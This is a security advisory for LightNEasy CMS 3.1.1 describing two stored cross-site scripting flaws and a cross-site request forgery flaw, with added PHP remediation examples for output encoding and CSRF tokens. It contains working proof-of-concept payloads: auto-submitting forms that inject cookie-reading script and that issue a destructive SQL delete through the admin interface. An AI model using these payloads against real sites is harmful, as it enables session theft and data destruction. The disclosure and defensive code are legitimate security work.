Multiple Vulnerabilities in LightNEasy CMS
Advisory ID: HTB22387
Product: LightNEasy CMS
Vendor: Fernando Baptista
Vulnerable Versions: 3.1.1 and probably prior versions
Tested Version: 3.1.1 and probably previous versions
Advisory Publication: May 18, 2010 [without technical details]
Vendor Notification: May 18, 2010
Public Disclosure: June 1, 2010
Vulnerability Type: Cross-Site Scripting [CWE-79]; Cross-Site Scripting [CWE-79]; Cross-Site Request Forgery [CWE-352]
Risk Level: Medium
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N); 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N); 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab

Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in LightNEasy CMS which could be exploited to perform script insertion, cross-site scripting and cross-site request forgery attacks.
1) Cross-site scripting (XSS) vulnerability in LightNEasy CMS 1.1

The vulnerability exists due to an input sanitation error in the "footer" parameter in LightNEasy/admin.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires the victim to be logged in as an administrator.

Exploitation example:

<form action="http://host/LightNEasy.php?do=setup" method="post" name="main">
  <input type="hidden" name="password" value="" />
  <input name="admin" type="hidden" value='admin' />
  <input type="hidden" name="email" value="example@example.com" />
  <input type="hidden" name="wemail" value="example@example.com" />
  <input type="hidden" name="restricted" value="" />
  <input type="hidden" name="homepath" value="./" />
  <input type="hidden" name="template" value="lightneasy" />
  <input type="hidden" name="title" value="site title" />
  <input type="hidden" name="subtitle" value="site subtitle" />
  <input type="hidden" name="keywords" value="" />
  <input type="hidden" name="description" value="" />
  <input type="hidden" name="author" value="" />
  <input type="hidden" name="footer" value='hello"><script>alert(document.cookie)</script>' />
  <input type="hidden" name="timeoffset" value="0" />
  <input type="hidden" name="dateformat" value="%m/%d/%y - %I:%M %p" />
  <input type="hidden" name="indexfile" value="LightNEasy.php" />
  <input type="hidden" name="language" value="en_US" />
  <input type="hidden" name="langeditor" value="en" />
  <input type="submit" name="submit" value="Save Setup" id="mybtn" />
</form>
<script>
  document.getElementById("mybtn").click();
</script>
2) Script insertion vulnerability in LightNEasy CMS

An input sanitation error exists in the "commentmessage" field in LightNEasy/common.php. A remote attacker can insert arbitrary HTML and script code, which will be executed in the user's browser in the context of the vulnerable website when the user reads published comments.

Exploitation example:

The attacker can leave a comment on the following page:

http://host/LightNEasy.php?page=news

and fill in the form as follows:

Your name: example
Your e-mail: example@example.com
Your comment: <script>alert(document.cookie)</script>
Code: Enter Captcha code

After the comment is published the malicious code will be executed on the following page:

http://example.com/LightNEasy.php?page=news&id=1&showcomments=1
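Both #1 and #2 are stored HTML injection: an administrator-controlled setting ("footer") and a visitor-controlled field ("commentmessage") are written into the page without encoding. The fix is contextual output encoding wherever a stored value reaches HTML, with input validation only as defence in depth. The script below is an added example and is not LightNEasy code; the template functions, the form field names other than "commentmessage" (commentname, commentemail) and the length limits are assumptions, and the inputs are constructed to match the shapes shown in the advisory.

```php
<?php
// Added example, not LightNEasy code: encode stored values (footer setting,
// comment fields) at the point where they are written into HTML.
declare(strict_types=1);

/** Encode a string for HTML element content or a quoted attribute value. */
function esc_html(string $value): string
{
    // ENT_QUOTES encodes both quote characters, so one helper serves element
    // content and single- or double-quoted attributes; ENT_SUBSTITUTE
    // replaces invalid UTF-8 instead of silently returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/** Template for a published comment: every dynamic field goes through esc_html(). */
function render_comment(array $comment): string
{
    return '<div class="comment">'
        . '<span class="author">' . esc_html($comment['name']) . '</span>'
        . '<p>' . esc_html($comment['message']) . '</p>'
        . '</div>';
}

/** Template for the site footer setting, used both as an attribute and as content. */
function render_footer(string $footer): string
{
    return '<footer title="' . esc_html($footer) . '">' . esc_html($footer) . '</footer>';
}

/** Validate the comment form on input (assumed field names); defence in depth, not the fix. */
function validate_comment(array $post): array
{
    $errors  = [];
    $name    = trim((string)($post['commentname'] ?? ''));
    $email   = trim((string)($post['commentemail'] ?? ''));
    $message = trim((string)($post['commentmessage'] ?? ''));
    if ($name === '' || mb_strlen($name) > 64) {
        $errors[] = 'name must be 1-64 characters';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'e-mail address is not valid';
    }
    if ($message === '' || mb_strlen($message) > 4000) {
        $errors[] = 'comment must be 1-4000 characters';
    }
    return $errors;
}

// Constructed inputs shaped like the ones in the advisory.
$comment = [
    'name'    => 'example',
    'message' => '<script>alert(document.cookie)</script>',
];
$footer = 'hello"><script>alert(document.cookie)</script>';

echo render_comment($comment), PHP_EOL;   // <script> tags are emitted as &lt;script&gt; text
echo render_footer($footer), PHP_EOL;     // the injected closing quote is emitted as &quot;
print_r(validate_comment([
    'commentname'    => 'example',
    'commentemail'   => 'not-an-address',
    'commentmessage' => 'hello',
]));
```

The encoding belongs in the template at output time rather than in a filter at save time: values stored once may later be rendered in several contexts, and a save-time filter that strips tags is easy to bypass and breaks legitimate text containing angle brackets. Setting the session cookie with the HttpOnly flag is a separate mitigation that keeps document.cookie out of reach of injected script but does not remove the injection itself.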
3) Cross-site request forgery (CSRF) in LightNEasy CMS

The vulnerability exists due to insufficient validation of the request origin in LightNEasy/admin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and execute arbitrary SQL commands in the application's database.

Exploitation example:

<form action="http://host/LightNEasy.php?do=database" method="post" name="main">
  <input type="hidden" name="query" value="delete from lne_menu where m3=1" />
  <input type="submit" name="submit" value="Query Database" id="mybtn" />
</form>
<script>
  document.getElementById("mybtn").click();
</script>
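The "Query Database" action is reachable by any POST that the administrator's browser happens to send, which is why an auto-submitting form on a third-party page suffices. The standard remedy is a per-session synchronizer token that only pages served by the application can embed, optionally backed by an Origin/Referer check. The script below is an added example, not LightNEasy code; the function names, the csrf_token field name and the simulated $_SESSION/$_POST/$_SERVER arrays are assumptions, and the two requests it evaluates are constructed for the demonstration.

```php
<?php
// Added example, not LightNEasy code: synchronizer-token protection for
// state-changing admin actions such as do=setup and do=database.
declare(strict_types=1);

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (!isset($session['csrf_token']) || !is_string($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));  // 256 bits from the CSPRNG
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every admin form the application renders. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '" />';
}

/**
 * Accept a state-changing request only if it is a POST carrying the session's
 * token. hash_equals() keeps the comparison constant-time.
 */
function csrf_valid(string $method, array $session, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($given)
        && $expected !== '' && hash_equals($expected, $given);
}

/**
 * Independent second check: when the browser sent an Origin or Referer header,
 * its host must be ours. A missing header falls through to the token check.
 */
function origin_allowed(array $server): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return true;
    }
    return parse_url($source, PHP_URL_HOST) === ($server['HTTP_HOST'] ?? '');
}

/** Gate to run in admin.php before executing any submitted query. */
function allow_admin_action(string $method, array $session, array $post, array $server): bool
{
    return csrf_valid($method, $session, $post) && origin_allowed($server);
}

// Constructed request data standing in for $_SESSION, $_POST and $_SERVER.
$session = [];
echo csrf_field($session), PHP_EOL;           // this is what the admin form must contain
$server = ['HTTP_HOST' => 'host', 'HTTP_ORIGIN' => 'http://host'];

// Administrator submits the application's own form: token present, origin matches.
$legit = ['query' => 'select count(*) from lne_menu', 'csrf_token' => $session['csrf_token']];
var_dump(allow_admin_action('POST', $session, $legit, $server));

// Form auto-submitted from another site: no token, foreign Origin.
$forged  = ['query' => 'delete from lne_menu where m3=1', 'submit' => 'Query Database'];
$foreign = ['HTTP_HOST' => 'host', 'HTTP_ORIGIN' => 'http://third-party.example'];
var_dump(allow_admin_action('POST', $session, $forged, $foreign));
```

The token is the primary control; the Origin check is supplementary because some clients and proxies omit those headers, which is why a missing header is not treated as a failure here. HTTP_HOST may carry a port while parse_url() returns only the host, so a deployment on a non-default port should compare both parts. Rejecting non-POST requests also closes the "specially crafted link" variant, since a GET from a link or image tag can never satisfy the check.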
Solution:

Vulnerability #2 was fixed in version 3.2
References:

[1] High-Tech Bridge Advisory HTB22387 - https://www.immuniweb.com/advisory/HTB22387 - Multiple Vulnerabilities in LightNEasy CMS
[2] LightNEasy CMS - www.lightneasy.org - LightNEasy is a simple to use Content Management System that will allow you to make a website literally in minutes.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.